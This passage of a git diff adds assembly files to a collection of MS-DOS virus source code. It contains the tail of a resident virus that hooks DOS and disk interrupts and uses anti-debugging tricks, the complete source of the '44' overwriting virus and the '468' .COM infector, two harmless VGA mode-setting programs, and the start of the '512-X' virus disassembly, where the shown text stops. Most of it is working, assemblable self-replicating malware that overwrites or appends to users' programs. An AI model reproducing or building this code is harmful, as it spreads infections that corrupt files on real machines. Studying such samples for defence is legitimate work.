(CS:12A7=0) + jns loc_62 ; Jump if not sign + mov word ptr [bp-4],0 + jmp loc_25 ; (0549) +loc_62: + jnz loc_63 ; Jump if not zero + cmp ax,cx + ja loc_63 ; Jump if above + mov cs:data_83,ax ; (CS:12AF=0) +loc_63: + mov dx,cs:data_78 ; (CS:12A5=0) + mov cx,cs:data_79 ; (CS:12A7=0) + or cx,cx ; Zero ? + jnz loc_64 ; Jump if not zero + cmp dx,1Ch + jbe loc_65 ; Jump if below or = +loc_64: + mov dx,cs:data_82 ; (CS:12AD=0) + mov cx,cs:data_83 ; (CS:12AF=0) + mov ah,3Fh ; '?' + call sub_24 ; INT 21 + add ax,cs:data_84 ; (CS:12B1=0) + mov [bp-4],ax + jmp loc_13 ; (0396) +loc_65: + mov si,dx + mov di,dx + add di,cs:data_83 ; (CS:12AF=0) + cmp di,1Ch + jb loc_66 ; Jump if below + xor di,di ; Zero register + jmp short loc_67 ; (0B35) +loc_66: + sub di,1Ch + neg di +loc_67: + mov ax,dx + mov cx,cs:data_81 ; (CS:12AB=0) + mov dx,cs:data_80 ; (CS:12A9=0) + add dx,0Fh + adc cx,0 + and dx,0FFF0h + sub dx,0FFCh + sbb cx,0 + add dx,ax + adc cx,0 + mov ax,4200h + call sub_24 ; INT 21 + mov cx,1Ch + sub cx,di + sub cx,si + mov ah,3Fh ; '?' + mov dx,cs:data_82 ; (CS:12AD=0) + call sub_24 ; INT 21 + add cs:data_82,ax ; (CS:12AD=0) + sub cs:data_83,ax ; (CS:12AF=0) + add cs:data_84,ax ; (CS:12B1=0) + xor cx,cx ; Zero register + mov dx,1Ch + mov ax,4200h + call sub_24 ; INT 21 + jmp loc_64 ; (0B04) +_21_40: and byte ptr cs:data_85,0FEh ; (CS:12B3=0) + call sub_11 ; (09E6) + jnz loc_68 ; Jump if not zero + jmp loc_61 ; (0AA2) +loc_68: + mov cs:data_83,cx ; (CS:12AF=0) + mov cs:data_82,dx ; (CS:12AD=0) + mov cs:data_84,0 ; (CS:12B1=0) + call sub_12 ; (0A04) + mov ax,cs:data_80 ; (CS:12A9=0) + mov dx,cs:data_81 ; (CS:12AB=0) + sub ax,1000h + sbb dx,0 + sub ax,cs:data_78 ; (CS:12A5=0) + sbb dx,cs:data_79 ; (CS:12A7=0) + js loc_69 ; Jump if sign=1 + jmp short loc_71 ; (0C47) +loc_69: + call sub_13 ; (0CC6) + push cs + pop ds + mov dx,data_80 ; (CS:12A9=0) + mov cx,data_81 ; (CS:12AB=0) + add dx,0Fh + adc cx,0 + and dx,0FFF0h + sub dx,0FFCh + sbb cx,0 + mov ax,4200h + call sub_24 ; INT 21 + mov dx,4 + mov cx,1Ch + mov ah,3Fh ; '?' + call sub_24 ; INT 21 + mov ax,4200h + xor cx,cx ; Zero register + mov dx,cx + call sub_24 ; INT 21 + mov dx,4 + mov cx,1Ch + mov ah,40h ; '@' + call sub_24 ; INT 21 + mov dx,0F000h + mov cx,0FFFFh + mov ax,4202h + call sub_24 ; INT 21 + mov ah,40h ; '@' + xor cx,cx ; Zero register + call sub_24 ; INT 21 + mov dx,data_78 ; (CS:12A5=0) + mov cx,data_79 ; (CS:12A7=0) + mov ax,4200h + call sub_24 ; INT 21 + mov ax,5700h + call sub_24 ; INT 21 + test dh,80h + jz loc_70 ; Jump if zero + sub dh,0C8h + mov ax,5701h + call sub_24 ; INT 21 +loc_70: + call sub_14 ; (0D6C) + jmp loc_10 ; (030F) +loc_71: + jnz loc_72 ; Jump if not zero + cmp ax,cx + ja loc_72 ; Jump if above + jmp loc_69 ; (0BC9) +loc_72: + mov dx,cs:data_78 ; (CS:12A5=0) + mov cx,cs:data_79 ; (CS:12A7=0) + or cx,cx ; Zero ? + jnz loc_73 ; Jump if not zero + cmp dx,1Ch + ja loc_73 ; Jump if above + jmp loc_69 ; (0BC9) +loc_73: + call sub_19 ; Restore REGS + call sub_24 ; INT 21 + call sub_17 ; Save REGS + mov ax,5700h + call sub_24 ; INT 21 + test dh,80h + jnz loc_74 ; Jump if not zero + add dh,0C8h + mov ax,5701h + call sub_24 ; INT 21 +loc_74: jmp loc_13 ; (0396) + jmp loc_10 ; (030F) + +int_13: pop word ptr cs:data_65 ; (CS:1241=0) + pop word ptr cs:data_65+2 ; (CS:1243=0) + pop cs:data_91 ; (CS:12DB=0) + and cs:data_91,0FFFEh ; (CS:12DB=0) + cmp byte ptr cs:data_90,0 ; (CS:12DA=0) + jne loc_75 ; Jump if not equal + push cs:data_91 ; (CS:12DB=0) + call dword ptr cs:old_INT ; (CS:122D=0) + jnc loc_76 ; Jump if carry=0 + inc cs:data_90 ; (CS:12DA=0) +loc_75: stc ; Set carry flag +loc_76: jmp dword ptr cs:data_65 ; (CS:1241=0) + +int_24: xor al,al ; Zero register + mov byte ptr cs:data_90,1 ; (CS:12DA=0) + iret ; Interrupt return + +; +; SUBROUTINE +; + +sub_13 proc near + mov byte ptr cs:data_90,0 ; (CS:12DA=0) + call sub_21 ; Save REGS in vir's stack + push cs + pop ds + mov al,13h + call sub_1 ; Get INT 13 vector + mov word ptr old_INT,bx ; (CS:122D=0) + mov word ptr old_INT+2,es ; (CS:122F=70h) + mov word ptr old_INT_13,bx ; (CS:1239=0) + mov word ptr old_INT_13+2,es ; (CS:123B=70h) + mov dl,0 + mov al,0Dh + call sub_1 ; Get INT 0D vector + mov ax,es + cmp ax,0C000h + jae loc_77 ; Jump if above or = + mov dl,2 +loc_77: + mov al,0Eh + call sub_1 ; Get INT 0E vector + mov ax,es + cmp ax,0C000h + jae loc_78 ; Jump if above or = + mov dl,2 +loc_78: + mov data_73,dl ; (CS:1250=0) + call sub_22 ; Set INT 01 for debuging + mov data_92,ss ; (CS:12DD=151Ch) + mov data_93,sp ; (CS:12DF=0) + push cs + mov ax,offset loc_79 + push ax + mov ax,70h + mov es,ax + mov cx,0FFFFh + mov al,0CBh + xor di,di ; Zero register + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + dec di + pushf ; Push flags + push es + push di + pushf ; Push flags + pop ax + or ah,1 + push ax + in al,21h ; port 21h, 8259-1 int IMR + mov data_97,al ; (CS:12E5=0) + mov al,0FFh + out 21h,al ; port 21h, 8259-1 int comands + popf ; Pop flags + xor ax,ax ; Zero register + jmp dword ptr old_INT ; (CS:122D=0) +loc_79: + lds dx,old_INT_1 ; (CS:1231=0) Load 32 bit ptr + mov al,1 + call sub_27 ; Set INT 01 vector + push cs + pop ds + mov dx,offset int_13 + mov al,13h + call sub_27 ; Set INT 13 vector + mov al,24h + call sub_1 ; Get INT 24 vector + mov word ptr old_INT_24,bx ; (CS:123D=0) + mov word ptr old_INT_24+2,es ; (CS:123F=70h) + mov dx,offset int_24 + mov al,24h + call sub_27 ; Set INT 24 vector + call sub_20 ; Restore regs from vir's stack + retn +sub_13 endp + + +; +; SUBROUTINE +; + +sub_14 proc near + call sub_21 ; Save REGS in vir's stack + lds dx,dword ptr cs:old_INT_13 ; (CS:1239=0) Load 32 bit ptr + mov al,13h + call sub_27 ; Set INT 13 vector + lds dx,dword ptr cs:old_INT_24 ; (CS:123D=0) Load 32 bit ptr + mov al,24h + call sub_27 ; Set INT 24 vector + call sub_20 ; Restore regs from vir's stack + retn +sub_14 endp + + +; +; SUBROUTINE +; + +sub_15 proc near + mov ax,3300h ; Get CTRL-BREAK state + call sub_24 ; INT 21 + mov cs:data_94,dl ; (CS:12E1) save state + mov ax,3301h + xor dl,dl ; Set CTRL-BREAK = OFF + call sub_24 ; INT 21 + retn +sub_15 endp + + +; +; SUBROUTINE +; + +sub_16 proc near + mov dl,cs:data_94 ; (CS:12E1) + mov ax,3301h ; Restore CTRL-BREAK state + call sub_24 ; INT 21 + retn +sub_16 endp + + +; +; SUBROUTINE +; + +sub_17 proc near + pop cs:data_100 ; (CS:12EA=0) + pushf ; Push flags + push ax + push bx + push cx + push dx + push si + push di + push ds + push es + jmp word ptr cs:data_100 ; (CS:12EA=0) +sub_17 endp + + +; +; SUBROUTINE +; + +sub_18 proc near + les di,dword ptr cs:ptr_INT_21 ; (CS:1235=0) Load 32 bit ptr + mov si,offset data_70 ; (CS:124B=0) + push cs + pop ds + cld ; Clear direction + mov cx,5 + +locloop_80: + lodsb ; String [si] to al + xchg al,es:[di] + mov [si-1],al + inc di + loop locloop_80 ; Loop if cx > 0 + + retn +sub_18 endp + + +; +; SUBROUTINE +; + +sub_19 proc near + pop cs:data_100 ; (CS:12EA=0) + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + popf ; Pop flags + jmp word ptr cs:data_100 ; (CS:12EA=0) + +; External Entry into Subroutine + +sub_20: + mov cs:data_114,offset sub_19 ; (CS:135D=0) Restore REGS + jmp short loc_81 ; (0DF6) + +; External Entry into Subroutine + +sub_21: + mov cs:data_114,offset sub_17 ; (CS:135D=0) Save REGS +loc_81: mov cs:data_112,ss ; (CS:1359=151Ch) + mov cs:data_111,sp ; (CS:1357=0) + push cs + pop ss + mov sp,cs:data_113 ; (CS:135B=0) + call word ptr cs:data_114 ; (CS:135D=0) + mov cs:data_113,sp ; (CS:135B=0) + mov ss,cs:data_112 ; (CS:1359=151Ch) + mov sp,cs:data_111 ; (CS:1357=0) + retn +sub_19 endp + + +; +; SUBROUTINE +; + +sub_22 proc near + mov al,1 + call sub_1 ; Get INT 01 vector + mov word ptr cs:old_INT_1,bx ; (CS:1231=0) + mov word ptr cs:old_INT_1+2,es ; (CS:1233=70h) + push cs + pop ds + mov dx,offset debug + call sub_27 ; Set INT 01 vector + retn +sub_22 endp + +_21_48: call sub_23 ; (0E3A) + jmp loc_10 ; (030F) + +; +; SUBROUTINE +; + +sub_23 proc near + cmp byte ptr cs:data_95,0 ; (CS:12E2=0) + je loc_ret_83 ; Jump if equal + cmp bx,0FFFFh + jne loc_ret_83 ; Jump if not equal + mov bx,160h + call sub_24 ; INT 21 + jc loc_ret_83 ; Jump if carry Set + mov dx,cs + cmp ax,dx + jb loc_82 ; Jump if below + mov es,ax + mov ah,49h + call sub_24 ; INT 21 + jmp short loc_ret_83 ; (0E8A) +loc_82: + dec dx + mov ds,dx + mov word ptr ds:MCB_0001,0 ; (7DBC:0001=275h) + inc dx + mov ds,dx + mov es,ax + push ax + mov cs:data_72,ax ; (CS:124E=7DBDh) + xor si,si ; Zero register + mov di,si + mov cx,all_len/2 + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + dec ax + mov es,ax + mov ax,cs:data_69 ; (CS:1249=0) + mov es:MCB_0001,ax ; (48FF:0001=0FFFFh) + mov ax,offset loc_ret_83 + push ax + retf +loc_ret_83: retn +sub_23 endp + +_21_37: mov byte ptr cs:data_104,2 ; (CS:12F0=0) + jmp loc_10 ; (030F) + +; +; SUBROUTINE +; + +sub_24 proc near ; calls INT 21 + pushf + call dword ptr cs:ptr_INT_21 ; (CS:1235=0) + retn +sub_24 endp + +boot: cli ; Disable interrupts + xor ax,ax ; Zero register + mov ss,ax + mov sp,7C00h + jmp short loc_85 ; (0EF4) + +data1 db 0dbh,0dbh,0dbh, 20h +data2 db 0f9h,0e0h,0e3h,0c3h + db 80h, 81h, 11h, 12h, 24h, 40h, 81h, 11h + db 12h, 24h, 40h,0F1h,0F1h, 12h, 24h, 40h + db 81h, 21h, 12h, 24h, 40h, 81h, 10h,0e3h + db 0C3h, 80h, 00h, 00h, 00h, 00h, 00h, 00h + db 00h, 00h, 00h, 00h, 82h, 44h,0F8h, 70h + db 0C0h, 82h, 44h, 80h, 88h,0C0h, 82h, 44h + db 80h, 80h,0C0h, 82h, 44h,0F0h, 70h,0C0h + db 82h, 28h, 80h, 08h,0C0h, 82h, 28h, 80h + db 88h, 00h,0F2h, 10h,0F8h, 70h,0C0h + +loc_85: push cs + pop ds + mov dx,0B000h + mov ah,0Fh + int 10h ; Video display ah=functn 0Fh + ; get state, al=mode, bh=page + cmp al,7 + je loc_86 ; Jump if equal + mov dx,0B800h +loc_86: + mov es,dx + cld ; Clear direction + xor di,di ; Zero register + mov cx,7D0h + mov ax,720h + rep stosw ; Rep when cx >0 Store ax to es:[di] + mov si,data2-boot+7C00h ; (CS:7C0E=0) + mov bx,2AEh +loc_87: + mov bp,5 + mov di,bx +loc_88: + lodsb ; String [si] to al + mov dh,al + mov cx,8 + +locloop_89: + mov ax,720h + shl dx,1 ; Shift w/zeros fill + jnc loc_90 ; Jump if carry=0 + mov al,0DBh +loc_90: + stosw ; Store ax to es:[di] + loop locloop_89 ; Loop if cx > 0 + + dec bp + jnz loc_88 ; Jump if not zero + add bx,0A0h + cmp si,loc_85-boot+7C00h + jb loc_87 ; Jump if below + mov ah,1 + int 10h ; Video display ah=functn 01h + ; set cursor mode in cx + mov al,8 + mov dx,loc_911-boot+7C00h + call sub_27 ; Set INT 08 vector + mov ax,7FEh + out 21h,al ; port 21h, 8259-1 int comands + ; al = 0FEh, IRQ0 (timer) only + sti ; Enable interrupts + xor bx,bx ; Zero register + mov cx,1 +loc_91: jmp short loc_91 ; SLEEP!!! +loc_911: dec cx ; INT 08 handler + jnz loc_92 ; Jump if not zero + xor di,di ; Zero register + inc bx + call sub_25 ; (0F67) + call sub_25 ; (0F67) + mov cl,4 +loc_92: + mov al,20h ; ' ' + out 20h,al ; port 20h, 8259-1 int command + ; al = 20h, end of interrupt + iret ; Interrupt return + +; +; SUBROUTINE +; + +sub_25 proc near + mov cx,28h + +locloop_93: + call sub_26 ; (0F93) + stosw ; Store ax to es:[di] + stosw ; Store ax to es:[di] + loop locloop_93 ; Loop if cx > 0 + +add1: add di,9Eh ; sub di,9Eh + mov cx,17h + +locloop_94: + call sub_26 ; (0F93) + stosw ; Store ax to es:[di] +add2: add di,9Eh ; sub di,9Eh + loop locloop_94 ; Loop if cx > 0 + +setd: std ; Set direction flag +_setd equ setd - boot + 7c00h + xor byte ptr ds:[_setd],1 ; (CS:7CE7=0) +_add1 equ add1 - boot + 7c01h + xor byte ptr ds:[_add1],28h ; (CS:7CD7=0) '(' +_add2 equ add2 - boot + 7c01h + xor byte ptr ds:[_add2],28h ; (CS:7CE2=0) '(' + retn +sub_25 endp + + +; +; SUBROUTINE +; + +sub_26 proc near + and bx,3 +_data1 equ data1 - boot + 7c00h + mov al,byte ptr ds:[_data1+bx] ; (CS:7C0A=0) + inc bx + retn +sub_26 endp + + +; +; SUBROUTINE +; + +sub_27 proc near + push es + push bx + xor bx,bx ; Zero register + mov es,bx + mov bl,al + shl bx,1 ; Shift w/zeros fill + shl bx,1 ; Shift w/zeros fill + mov es:[bx],dx + mov es:[bx+2],ds + pop bx + pop es + retn +sub_27 endp + + +; +; SUBROUTINE - *** DAMAGED BY STACK *** +; + +sub_28 proc near + call sub_13 ; (0CC6) + mov dl,1 + add [bp+si-4F2h],bl + pop es + jo $+2 ; Jump if overflow=1 + xor cx,word ptr ds:[32Eh] ; (0000:032E=0) + push di + sbb [bp+di],al + add byte ptr ds:[0],ah ; (0000:0000=5Bh) + add [bx+di],ah + add [bx+si+12h],dl + sbb dx,[bx] + loopnz $+11h ; Loop if zf=0, cx>0 + jnp $+23h ; Jump if not parity + db 0C1h, 02h, 31h, 41h, 7Ah, 16h + db 01h, 1Fh, 9Ah, 0Eh,0FBh, 07h + db 70h, 00h, 33h, 0Eh, 2Eh, 03h + db 57h, 18h, 57h, 1Fh,0A9h, 80h + db 00h, 00h, 57h, 1Fh +sub_28 endp + + org 1200h + +data_38 dw ? +data_40 dw ? +data_41 dw ?, ? +data_42 dw ? +data_43 dw ? +data_44 dw ? +data_45 dw ? +data_46 dw ?, ? +data_48 dw ? +data_49 dw ? + db 12 dup (?) +prm_blck_adr dw ?, ? +data_52 db ? +data_53 dw ? +data_54 dw ? +old_INT dd ? +old_INT_1 dd ? +ptr_INT_21 dd ? +old_INT_13 dd ? +old_INT_24 dd ? +data_65 dd ? +old_DS dw ? +data_68 dw ? +data_69 dw ? +data_70 db ? +data_71 dw ? +data_72 dw ? +data_73 db ? +data_74 db ? +data_75 db 50h dup (?) +data_76 db ? +data_77 dw ? +data_78 dw ? +data_79 dw ? +data_80 dw ? +data_81 dw ? +data_82 dw ? +data_83 dw ? +data_84 dw ? +data_85 dw ? +data_86 db 0Eh dup (?) +data_87 dw ? +data_88 dd ? + db ? +data_89 db 10h dup (?) +data_90 db ? +data_91 dw ? +data_92 dw ? +data_93 dw ? +data_94 db ? +data_95 db ? +old_AX dw ? +data_97 db ? +data_98 dw ? +data_99 dw ? +data_100 dw ? +data_101 dw ? +dos_ver db ? +data_103 db ? +data_104 db ? +exec_block db 0Eh dup (?) +data_106 dw ? +data_107 dw ? +entry_point dd ? +file_name db 50h dup (?) +data_111 dw ? +data_112 dw ? +data_113 dw ? +data_114 dw ? + +seg_a ends + + end + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.43.asm b/MSDOS/Virus.MSDOS.Unknown.43.asm new file mode 100644 index 00000000..3a81e855 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.43.asm @@ -0,0 +1,37 @@ +; Basic little bitty program for people learning about the different modes +; you can stick on your monitor. This program will put you into 80*50 on a +; VGA monitor, and should be 80*43 on an EGA monitor (I dunno, haven't tested +; it.) Anyways, I tried to comment it so someone not knowing asm would be +; able to understand it. +; +; Coded by The Crypt Keeper/Kevin Marcus +; You may feel free to do absolutely anything to this code, so long as it is +; not distributed in a modified state. (Incorporate it in your programs, I +; don't care. Just do not change >THIS< program.) +; +; The Programmer's Paradise. (619)/457-1836 + +IDEAL ; Ideal Mode in TASM is t0tallie /< rad man. +DOSSEG ; Standard Segment shit. +MODEL tiny ; What model are we in?! +DATASEG ; Data Segment starts here, man. +exitcode db 0 ; 'exitcode' be zer0, man. +CODESEG ; Code Segment starts here, dude. + org 100h +Start: + mov ax,0003h ; stick 3 into ax. + int 10h ; Set up 80*25, text mode. Clear the screen, too. + + mov ax,1201h ; Woah! + mov bl,30h + int 10h ; Lets get ready for 80*43 on VGA man. + + mov ax,1112h ; We are gunna use the 8*8 internal font, man. + int 10h ; Hey man, call the interrupt. + +Exit: + + mov ah,4ch ; Lets ditch. + mov al,[exitcode] ; Make al 0. Why not xor!? Suck a ____. + int 21h ; "Make it so." + END Start ; No more program. \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.44.asm b/MSDOS/Virus.MSDOS.Unknown.44.asm new file mode 100644 index 00000000..084ed6da --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.44.asm @@ -0,0 +1,99 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +;****************************************************************************** +;* 44-virus version 1.0 +;* +;* Assemble with Tasm 1.01 +;* +;* The 44 virus is a non-resident overwriting virus with a lenght +;* of 44 bytes. It will infect all files with the extension .C* +;* in the current directory. +;* +;* (c) 1991 Dark Helmet +;* +;* The author is not responsible for any damage caused by the virus +;* +;****************************************************************************** + +virus segment + org 100h + assume cs:virus + +len equ offset last-100h + +start: mov ah,04eh ; Search first file with extension .c* + xor cx,cx ; Only normal files + lea dx,com_mask ; + int 21h + +open_file: mov ax,3d02h ; open file for read/write + mov dx,9eh + int 21h + +Infect: mov cx,len ; Write virus to start of file + lea dx,start + mov ah,40h + int 21h + +Next: mov ah,3eh ; Close file + int 21h + mov ah,4fh ; Search next file + int 21h + jnb open_file ; Are there any files left? + +com_mask: db "*.c*",0 ; mask +last: db 090h + +virus ends + end start + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; + +;; +;> and Remember Don't Forget to Call <; +;> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <; +;; + diff --git a/MSDOS/Virus.MSDOS.Unknown.468.asm b/MSDOS/Virus.MSDOS.Unknown.468.asm new file mode 100644 index 00000000..4ed48693 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.468.asm @@ -0,0 +1,257 @@ +; virus from ALT-11 mag + +; --------------------------------------- +; +; Coded by: Azagoth +; --------------------------------------- +; Assemble using Turbo Assembler: +; tasm /m2 .asm +; tlink /t .obj +; --------------------------------------------------------------------------- +; - Non-Overwriting .COM infector (excluding COMMAND.COM) +; - COM growth: XXX bytes +; - It searches the current directory for uninfected files. If none are +; found, it searches previous directory until it reaches root and no more +; uninfected files are found. (One infection per run) +; - Also infects read-only files +; - Restores attributes, initial date/time-stamps, and original path. +; --------------------------------------------------------------------------- + + .model tiny + .code + + org 100h ; adjust for psp + +start: + + call get_disp ; push ip onto stack +get_disp: + pop bp ; bp holds current ip + sub bp, offset get_disp ; bp = code displacement + + ; original label offset is stored in machine code + ; so new (ip) - original = displacement of code + +save_path: + mov ah, 47h ; save cwd + xor dl, dl ; 0 = default drive + lea si, [bp + org_path] + int 21h + +get_dta: + mov ah, 2fh + int 21h + + mov [bp + old_dta_off], bx ; save old dta offset + +set_dta: ; point to dta record + mov ah, 1ah + lea dx, [bp + dta_filler] + int 21h + +search: + mov ah, 4eh ; find first file + mov cx, [bp + search_attrib] ; if successful dta is + lea dx, [bp + search_mask] ; created + int 21h + jnc clear_attrib ; if found, continue + +find_next: + mov ah, 4fh ; find next file + int 21h + jnc clear_attrib + +still_searching: + mov ah, 3bh + lea dx, [bp + previous_dir] ; cd .. + int 21h + jnc search + jmp bomb ; at root, no more files + +clear_attrib: + mov ax, 4301h + xor cx, cx ; get rid of attributes + lea dx, [bp + dta_file_name] + int 21h + +open_file: + mov ax, 3D02h ; AL=2 read/write + lea dx, [bp + dta_file_name] + int 21h + + xchg bx, ax ; save file handle + ; bx won't change from now on +check_if_command_com: + cld + lea di, [bp + com_com] + lea si, [bp + dta_file_name] + mov cx, 11 ; length of 'COMMAND.COM' + repe cmpsb ; repeat while equal + jne check_if_infected + jmp close_file + +check_if_infected: + mov dx, word ptr [bp + dta_file_size] ; only use first word since + ; COM file + sub dx, 2 ; file size - 2 + + mov ax, 4200h + mov cx, 0 ; cx:dx ptr to offset from + int 21h ; origin of move + + mov ah, 3fh ; read last 2 characters + mov cx, 2 + lea dx, [bp + last_chars] + int 21h + + mov ah, [bp + last_chars] + cmp ah, [bp + virus_id] + jne save_3_bytes + mov ah, [bp + last_chars + 1] + cmp ah, [bp + virus_id + 1] + jne save_3_bytes + jmp close_file + +save_3_bytes: + mov ax, 4200h ; 00=start of file + xor cx, cx + xor dx, dx + int 21h + + mov ah, 3Fh + mov cx, 3 + lea dx, [bp + _3_bytes] + int 21h + +goto_eof: + mov ax, 4202h ; 02=End of file + xor cx, cx ; offset from origin of move + xor dx, dx ; (i.e. nowhere) + int 21h ; ax holds file size + + ; since it is a COM file, overflow will not occur + +save_jmp_displacement: + sub ax, 3 ; file size - 3 = jmp disp. + mov [bp + jmp_disp], ax + +write_code: + mov ah, 40h + mov cx, virus_length ;*** equate + lea dx, [bp + start] + int 21h + +goto_bof: + mov ax, 4200h + xor cx, cx + xor dx, dx + int 21h + +write_jmp: ; to file + mov ah, 40h + mov cx, 3 + lea dx, [bp + jmp_code] + int 21h + + inc [bp + infections] + +restore_date_time: + mov ax, 5701h + mov cx, [bp + dta_file_time] + mov dx, [bp + dta_file_date] + int 21h + +close_file: + mov ah, 3eh + int 21h + +restore_attrib: + xor ch, ch + mov cl, [bp + dta_file_attrib] ; restore original attributes + mov ax, 4301h + lea dx, [bp + dta_file_name] + int 21h + +done_infecting?: + mov ah, [bp + infections] + cmp ah, [bp + max_infections] + jz bomb + jmp find_next + + +bomb: + +; cmp bp, 0 +; je restore_path ; original run +; +;---- Stuff deleted + +restore_path: + mov ah, 3bh ; when path stored + lea dx, [bp + root] ; '\' not included + int 21h + + mov ah, 3bh ; cd to original path + lea dx, [bp + org_path] + int 21h + +restore_dta: + mov ah, 1ah + mov dx, [bp + old_dta_off] + int 21h + +restore_3_bytes: ; in memory + lea si, [bp + _3_bytes] + mov di, 100h + cld ; auto-inc si, di + mov cx, 3 + rep movsb + +return_control_or_exit?: + cmp bp, 0 ; bp = 0 if original run + je exit + mov di, 100h ; return control back to prog + jmp di ; -> cs:100h + +exit: + mov ax, 4c00h + int 21h + +;-------- Variable Declarations -------- + +old_dta_off dw 0 ; offset of old dta address + +;-------- dta record +dta_filler db 21 dup (0) +dta_file_attrib db 0 +dta_file_time dw 0 +dta_file_date dw 0 +dta_file_size dd 0 +dta_file_name db 13 dup (0) +;-------- +search_mask db '*.COM',0 ; files to infect: *.COM +search_attrib dw 00100111b ; all files a,s,h,r +com_com db 'COMMAND.COM' + +previous_dir db '..',0 +root db '\',0 +org_path db 64 dup (0) ; original path + +infections db 0 ; counter +max_infections db 1 + +_3_bytes db 0, 0, 0 +jmp_code db 0E9h +jmp_disp dw 0 + +last_chars db 0, 0 ; do last chars = ID ? + +virus_id db 'AZ' + +eov: ; end of virus + +virus_length equ offset eov - offset start + + end start + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.50.asm b/MSDOS/Virus.MSDOS.Unknown.50.asm new file mode 100644 index 00000000..10b6ee24 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.50.asm @@ -0,0 +1,33 @@ +; Basic little bitty program for people learning about the different modes +; you can stick on your monitor. This program will put you into 80*50 on a +; VGA monitor, and should be 80*43 on an EGA monitor (I dunno, haven't tested +; it.) Anyways, I tried to comment it so someone not knowing asm would be +; able to understand it. +; +; Coded by The Crypt Keeper/Kevin Marcus +; You may feel free to do absolutely anything to this code, so long as it is +; not distributed in a modified state. (Incorporate it in your programs, I +; don't care. Just do not change >THIS< program.) +; +; The Programmer's Paradise. (619)/457-1836 + +IDEAL ; Ideal Mode in TASM is t0tallie /< rad man. +DOSSEG ; Standard Segment shit. +MODEL tiny ; What model are we in?! +DATASEG ; Data Segment starts here, man. +exitcode db 0 ; 'exitcode' be zer0, man. +CODESEG ; Code Segment starts here, dude. + org 100h +Start: + mov ax,0003h ; stick 3 into ax. + int 10h ; Set up 80*25, text mode. Clear the screen, too. + + mov ax,1112h ; We are gunna use the 8*8 internal font, man. + int 10h ; Hey man, call the interrupt. + +Exit: + + mov ah,4ch ; Lets ditch. + mov al,[exitcode] ; Make al 0. Why not xor!? Suck a ____. + int 21h ; "Make it so." + END Start ; No more program. \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.512-x.asm b/MSDOS/Virus.MSDOS.Unknown.512-x.asm new file mode 100644 index 00000000..fbb95350 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.512-x.asm @@ -0,0 +1,304 @@ +;NAME: 512-X.C-M +;FILE SIZE: 00200h - 512d +;START (CS:IP): 00100h +;CODE END: 00300h +;CODE ORIGIN: 00100h +;DATE: Wed Aug 05 13:56:29 1992 + +CODE SEGMENT BYTE PUBLIC 'CODE' +ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING + +P00100 PROC + ORG 0100h + +H00100: MOV AH,30h ;00100 B430 _0 + INT 21h ;2-DOS_Ver ;00102 CD21 _! + MOV SI,0004h ;00104 BE0400 ___ + MOV DS,SI ;DS_Chg ;00107 8EDE __ + CMP AH,1Eh ;00109 80FC1E ___ + LDS AX,[SI+08h] ;0010C C54408 _D_ + JB H0011B ;0010F 720A r_ + MOV AH,13h ;00111 B413 __ + INT 2Fh ;3-Prt_Splr_Ctrl ;00113 CD2F _/ + PUSH DS ;00115 1E _ + PUSH DX ;00116 52 R + INT 2Fh ;3-Prt_Splr_Ctrl ;00117 CD2F _/ + POP AX ;00119 58 X + POP DS ;0011A 1F _ +H0011B: MOV DI,00F8h ;0011B BFF800 ___ + STOSW ;0011E AB _ + MOV AX,DS ;0011F 8CD8 __ + STOSW ;00121 AB _ + MOV DS,SI ;DS_Chg ;00122 8EDE __ + LDS AX,[SI+40h] ;00124 C54440 _D@ + STOSW ;00127 AB _ + CMP AX,0121h ;00128 3D2101 =!_ + MOV AX,DS ;0012B 8CD8 __ + STOSW ;0012D AB _ + PUSH ES ;0012E 06 _ + PUSH DI ;0012F 57 W + JNZ H00139 ;00130 7507 u_ + SHL SI,1 ;00132 D1E6 __ + MOV CX,0100h ;00134 B90001 ___ + REPZ CMPSW ;00137 F3A7 __ +H00139: PUSH CS ;00139 0E _ + POP DS ;0013A 1F _ + JZ H00187 ;0013B 744A tJ + MOV AH,52h 